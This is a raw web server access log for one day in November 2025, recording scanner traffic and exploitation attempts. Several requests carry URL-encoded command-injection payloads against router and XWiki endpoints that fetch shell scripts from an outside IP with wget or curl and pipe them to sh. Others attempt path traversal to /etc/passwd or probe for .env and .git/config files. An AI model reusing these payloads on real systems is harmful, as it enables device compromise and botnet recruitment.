18.222.109.129 - - [28/Nov/2025:00:17:54 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743
3.90.58.105 - - [28/Nov/2025:00:43:32 +0100] "GET / HTTP/1.1" 200 1895
45.38.44.221 - - [28/Nov/2025:00:46:10 +0100] "GET /login HTTP/1.1" 404 723
79.124.49.90 - - [28/Nov/2025:00:53:23 +0100] "CONNECT ip-api.com:80 HTTP/1.1" 400 804
212.102.57.94 - - [28/Nov/2025:01:02:04 +0100] "CONNECT www.uni-konstanz.de:443 HTTP/1.1" 400 804
151.242.30.13 - - [28/Nov/2025:01:32:42 +0100] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 404 756
65.49.1.202 - - [28/Nov/2025:01:46:02 +0100] "-" 400 1930
45.38.44.221 - - [28/Nov/2025:02:10:54 +0100] "GET /login HTTP/1.1" 404 723
176.65.148.40 - - [28/Nov/2025:02:23:29 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
205.210.31.185 - - [28/Nov/2025:02:40:11 +0100] "GET / HTTP/1.0" 200 1895
167.94.138.167 - - [28/Nov/2025:02:55:50 +0100] "-" 400 1930
167.94.138.167 - - [28/Nov/2025:02:55:53 +0100] "-" 400 1930
149.100.172.125 - - [28/Nov/2025:03:13:53 +0100] "GET / HTTP/1.0" 200 1895
172.236.228.193 - - [28/Nov/2025:03:15:36 +0100] "GET / HTTP/1.1" 200 1895
37.19.220.46 - - [28/Nov/2025:03:33:49 +0100] "CONNECT upload.wikimedia.org:443 HTTP/1.1" 400 804
95.80.77.125 - - [28/Nov/2025:03:39:22 +0100] "GET / HTTP/1.1" 200 1895
98.80.4.42 - - [28/Nov/2025:03:52:22 +0100] "GET / HTTP/1.1" 200 1895
66.132.153.60 - - [28/Nov/2025:05:06:16 +0100] "GET / HTTP/1.1" 200 1895
66.132.153.60 - - [28/Nov/2025:05:06:19 +0100] "-" 400 1930
66.132.153.60 - - [28/Nov/2025:05:06:20 +0100] "GET / HTTP/1.1" 200 1895
66.132.153.60 - - [28/Nov/2025:05:06:20 +0100] "GET /favicon.ico HTTP/1.1" 404 729
66.132.153.60 - - [28/Nov/2025:05:06:23 +0100] "-" 400 1930
66.132.153.60 - - [28/Nov/2025:05:06:23 +0100] "GET /login HTTP/1.1" 404 723
176.65.148.40 - - [28/Nov/2025:06:12:09 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
3.132.23.201 - - [28/Nov/2025:06:15:20 +0100] "GET / HTTP/1.1" 200 1895
205.210.31.67 - - [28/Nov/2025:06:17:03 +0100] "-" 400 1930
205.210.31.67 - - [28/Nov/2025:06:17:03 +0100] "-" 400 1930
3.130.96.91 - - [28/Nov/2025:06:50:31 +0100] "GET / HTTP/1.1" 200 1895
3.130.96.91 - - [28/Nov/2025:06:52:10 +0100] "GET / HTTP/1.1" 200 1895
192.159.99.101 - - [28/Nov/2025:06:53:28 +0100] "-" 400 1930
3.130.96.91 - - [28/Nov/2025:06:53:58 +0100] "-" 400 1930
3.130.96.91 - - [28/Nov/2025:06:56:32 +0100] "-" 400 1930
3.130.96.91 - - [28/Nov/2025:06:58:15 +0100] "-" 400 1930
185.247.137.17 - - [28/Nov/2025:07:53:29 +0100] "GET / HTTP/1.1" 200 1895
152.32.146.202 - - [28/Nov/2025:08:19:29 +0100] "-" 400 1930
152.32.146.202 - - [28/Nov/2025:08:19:40 +0100] "GET / HTTP/1.1" 200 1895
152.32.146.202 - - [28/Nov/2025:08:19:58 +0100] "GET /favicon.ico HTTP/1.1" 404 729
152.32.146.202 - - [28/Nov/2025:08:19:59 +0100] "GET /robots.txt HTTP/1.1" 404 728
152.32.146.202 - - [28/Nov/2025:08:19:59 +0100] "GET /sitemap.xml HTTP/1.1" 404 729
152.32.146.202 - - [28/Nov/2025:08:20:00 +0100] "GET /config.json HTTP/1.1" 404 729
185.226.197.73 - - [28/Nov/2025:08:59:11 +0100] "GET / HTTP/1.1" 200 1895
176.65.148.40 - - [28/Nov/2025:10:09:19 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
18.116.39.122 - - [28/Nov/2025:10:24:25 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743
159.65.134.223 - - [28/Nov/2025:10:58:28 +0100] "-" 400 1930
159.65.134.223 - - [28/Nov/2025:10:58:28 +0100] "-" 400 1930
159.65.134.223 - - [28/Nov/2025:10:58:28 +0100] "GET / HTTP/1.1" 200 1895
159.65.134.223 - - [28/Nov/2025:10:58:29 +0100] "GET /download/powershell/ HTTP/1.1" 404 746
159.65.134.223 - - [28/Nov/2025:10:58:29 +0100] "GET /get.php HTTP/1.1" 404 725
209.38.220.179 - - [28/Nov/2025:11:02:20 +0100] "GET / HTTP/1.0" 200 1895
64.226.66.124 - - [28/Nov/2025:11:02:20 +0100] "GET /v2/_catalog HTTP/1.1" 404 733
104.248.22.187 - - [28/Nov/2025:11:02:20 +0100] "GET /solr/admin/info/system HTTP/1.1" 404 752
157.230.123.253 - - [28/Nov/2025:11:02:20 +0100] "-" 400 1930
104.248.44.176 - - [28/Nov/2025:11:02:20 +0100] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 723
104.248.44.176 - - [28/Nov/2025:11:02:20 +0100] "GET / HTTP/1.1" 200 1895
165.227.143.235 - - [28/Nov/2025:11:02:20 +0100] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 743
104.248.22.187 - - [28/Nov/2025:11:02:21 +0100] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 742
157.230.123.253 - - [28/Nov/2025:11:02:21 +0100] "-" 400 1930
165.232.67.168 - - [28/Nov/2025:11:02:21 +0100] "GET / HTTP/1.1" 200 1895
165.232.67.168 - - [28/Nov/2025:11:02:21 +0100] "-" 400 1930
157.245.196.243 - - [28/Nov/2025:11:02:21 +0100] "GET /favicon.ico HTTP/1.1" 404 729
192.159.99.95 - - [28/Nov/2025:11:05:24 +0100] "POST /tmUnblock.cgi HTTP/1.1" 404 731
192.159.99.95 - - [28/Nov/2025:11:05:24 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
192.159.99.95 - - [28/Nov/2025:11:05:24 +0100] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 756
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F&currentsetting.htm=1 HTTP/1.1" 404 727
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "GET null HTTP/1.1" 400 1994
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 731
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "POST /goform/mp HTTP/1.1" 404 731
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 749
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "POST /goform/setPingInfo HTTP/1.1" 404 740
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "POST /cgi-bin/server/server.cgi?func=server02_main_submit&counter=5.22497857400916&TEST_BTN4= HTTP/1.1" 404 751
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "POST /diagnostic.php HTTP/1.1" 404 732
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "GET / HTTP/1.1" 200 1895
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "GET /HNAP1/ HTTP/1.1" 404 728
192.159.99.95 - - [28/Nov/2025:11:05:25 +0100] "POST /goform/SystemCommand HTTP/1.1" 404 742
192.159.99.95 - - [28/Nov/2025:11:05:26 +0100] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 792
192.159.99.95 - - [28/Nov/2025:11:05:26 +0100] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 750
192.159.99.95 - - [28/Nov/2025:11:05:26 +0100] "GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%5B%27sh%27%2C%20%27-c%27%2C%20%27%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.sdu.sh%29%7Csh%27%5D.execute%28%29.text%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D HTTP/1.1" 404 763
192.159.99.95 - - [28/Nov/2025:11:05:26 +0100] "GET /?doAs=%60%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.pms.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.pms.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.pms.sh%29%7Csh%60 HTTP/1.1" 200 1895
192.159.99.95 - - [28/Nov/2025:11:05:26 +0100] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 404 743
192.159.99.95 - - [28/Nov/2025:11:05:26 +0100] "POST /goform/formJsonAjaxReq HTTP/1.1" 404 744
45.38.44.221 - - [28/Nov/2025:12:18:51 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
45.55.47.18 - - [28/Nov/2025:12:42:34 +0100] "GET / HTTP/1.1" 200 1895
65.49.1.232 - - [28/Nov/2025:13:06:14 +0100] "GET / HTTP/1.1" 200 1895
65.49.1.236 - - [28/Nov/2025:13:06:36 +0100] "GET /favicon.ico HTTP/1.1" 404 729
65.49.1.239 - - [28/Nov/2025:13:06:48 +0100] "GET /?format=json HTTP/1.1" 200 1895
65.49.1.236 - - [28/Nov/2025:13:06:53 +0100] "CONNECT www.shadowserver.org:443 HTTP/1.1" 400 804
65.49.1.232 - - [28/Nov/2025:13:07:04 +0100] "GET /geoserver/web/ HTTP/1.1" 404 740
18.97.19.249 - - [28/Nov/2025:13:23:15 +0100] "GET / HTTP/1.1" 200 1895
45.38.44.221 - - [28/Nov/2025:13:26:53 +0100] "GET /login HTTP/1.1" 404 723
168.232.14.118 - - [28/Nov/2025:13:41:42 +0100] "GET / HTTP/1.1" 200 1895
94.243.9.193 - - [28/Nov/2025:14:11:08 +0100] "GET /boaform/admin/formLogin?username=ec8&psd=ec8 HTTP/1.0" 404 749
20.64.105.19 - - [28/Nov/2025:14:17:16 +0100] "GET /manager/html HTTP/1.1" 401 2499
68.183.62.229 - - [28/Nov/2025:15:39:56 +0100] "-" 400 1930
68.183.62.229 - - [28/Nov/2025:15:39:56 +0100] "-" 400 1930
68.183.62.229 - - [28/Nov/2025:15:39:57 +0100] "GET / HTTP/1.1" 200 1895
68.183.62.229 - - [28/Nov/2025:15:39:57 +0100] "GET /download/powershell/ HTTP/1.1" 404 746
68.183.62.229 - - [28/Nov/2025:15:39:57 +0100] "GET /get.php HTTP/1.1" 404 725
45.135.193.9 - - [28/Nov/2025:15:40:52 +0100] "GET /json/ HTTP/1.1" 404 727
18.97.19.245 - - [28/Nov/2025:16:07:49 +0100] "GET / HTTP/1.1" 200 1895
88.214.25.125 - - [28/Nov/2025:16:43:20 +0100] "-" 400 1930
83.142.209.135 - - [28/Nov/2025:16:48:59 +0100] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 404 756
91.239.216.9 - - [28/Nov/2025:17:33:37 +0100] "GET /index.htm HTTP/1.1" 404 727
91.239.216.9 - - [28/Nov/2025:17:33:37 +0100] "GET / HTTP/1.1" 200 1895
91.239.216.9 - - [28/Nov/2025:17:33:37 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:17:33:38 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:17:33:39 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:17:33:41 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:17:33:43 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:17:35:17 +0100] "-" 400 1930
165.227.143.235 - - [28/Nov/2025:17:56:09 +0100] "-" 400 1930
94.26.88.83 - - [28/Nov/2025:17:59:25 +0100] "-" 400 1930
192.159.99.95 - - [28/Nov/2025:18:37:44 +0100] "POST /functionRouter HTTP/1.1" 404 732
91.239.216.9 - - [28/Nov/2025:19:06:39 +0100] "GET / HTTP/1.1" 200 1895
91.239.216.9 - - [28/Nov/2025:19:06:39 +0100] "GET /index.htm HTTP/1.1" 404 727
91.239.216.9 - - [28/Nov/2025:19:06:39 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:06:39 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:06:39 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:06:40 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:06:41 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:08:12 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:09:43 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:11:26 +0100] "-" 400 1930
91.239.216.9 - - [28/Nov/2025:19:13:18 +0100] "-" 400 1930
196.251.100.11 - - [28/Nov/2025:19:45:06 +0100] "CONNECT 45.61.137.126:7227 HTTP/1.1" 400 804
45.135.193.9 - - [28/Nov/2025:19:51:19 +0100] "GET /json/ HTTP/1.1" 404 727
44.220.185.38 - - [28/Nov/2025:19:52:28 +0100] "GET / HTTP/1.1" 200 1895
147.185.132.150 - - [28/Nov/2025:20:04:04 +0100] "GET / HTTP/1.1" 200 1895
45.156.87.211 - - [28/Nov/2025:20:17:31 +0100] "-" 400 1930
45.156.87.211 - - [28/Nov/2025:20:17:31 +0100] "GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 400 813
192.159.99.95 - - [28/Nov/2025:20:31:45 +0100] "POST / HTTP/1.1" 200 1895
34.122.105.182 - - [28/Nov/2025:20:56:24 +0100] "GET / HTTP/1.1" 200 1895
45.135.193.9 - - [28/Nov/2025:20:58:47 +0100] "GET /json/ HTTP/1.1" 404 727
18.97.19.141 - - [28/Nov/2025:21:18:35 +0100] "GET / HTTP/1.1" 200 1895
165.154.162.212 - - [28/Nov/2025:21:25:46 +0100] "GET / HTTP/1.1" 200 1895
165.154.162.212 - - [28/Nov/2025:21:25:46 +0100] "-" 400 1930
81.15.138.97 - - [28/Nov/2025:21:49:54 +0100] "GET / HTTP/1.1" 200 1895
101.36.106.134 - - [28/Nov/2025:22:06:19 +0100] "GET / HTTP/1.1" 200 1895
101.36.106.134 - - [28/Nov/2025:22:06:19 +0100] "GET /favicon.ico HTTP/1.1" 404 729
101.36.106.134 - - [28/Nov/2025:22:06:20 +0100] "GET /robots.txt HTTP/1.1" 404 728
101.36.106.134 - - [28/Nov/2025:22:06:20 +0100] "GET /sitemap.xml HTTP/1.1" 404 729
101.36.106.134 - - [28/Nov/2025:22:06:21 +0100] "GET null HTTP/1.1" 400 1994
101.36.106.134 - - [28/Nov/2025:22:06:21 +0100] "GET /struts/webconsole.html HTTP/1.1" 404 744
101.36.106.134 - - [28/Nov/2025:22:06:22 +0100] "GET /?actionErrors=1111 HTTP/1.1" 200 1895
101.36.106.134 - - [28/Nov/2025:22:06:22 +0100] "GET /invoker/readonly HTTP/1.1" 404 738
176.65.148.40 - - [28/Nov/2025:22:19:42 +0100] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 748
45.156.87.211 - - [28/Nov/2025:22:31:22 +0100] "-" 400 1930
45.156.87.211 - - [28/Nov/2025:22:31:22 +0100] "GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 400 813
94.156.152.6 - - [28/Nov/2025:22:41:59 +0100] "GET /login HTTP/1.1" 404 723
165.232.94.68 - - [28/Nov/2025:22:58:57 +0100] "GET /.env HTTP/1.1" 404 722
165.232.94.68 - - [28/Nov/2025:22:58:57 +0100] "GET /.git/config HTTP/1.1" 404 733
193.142.147.209 - - [28/Nov/2025:23:03:33 +0100] "GET / HTTP/1.1" 200 1895
104.164.110.7 - - [28/Nov/2025:23:12:43 +0100] "-" 400 1930
104.164.110.7 - - [28/Nov/2025:23:12:43 +0100] "GET /..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 400 813
192.159.99.95 - - [28/Nov/2025:23:32:36 +0100] "POST /actuator/gateway/routes/rxvpkejx HTTP/1.1" 404 762
192.159.99.95 - - [28/Nov/2025:23:47:29 +0100] "POST /actuator/gateway/refresh HTTP/1.1" 404 750
213.209.143.75 - - [28/Nov/2025:23:56:05 +0100] "GET /ftptest.cgi HTTP/1.0" 404 729
44.220.185.28 - - [28/Nov/2025:23:58:49 +0100] "GET / HTTP/1.1" 200 1895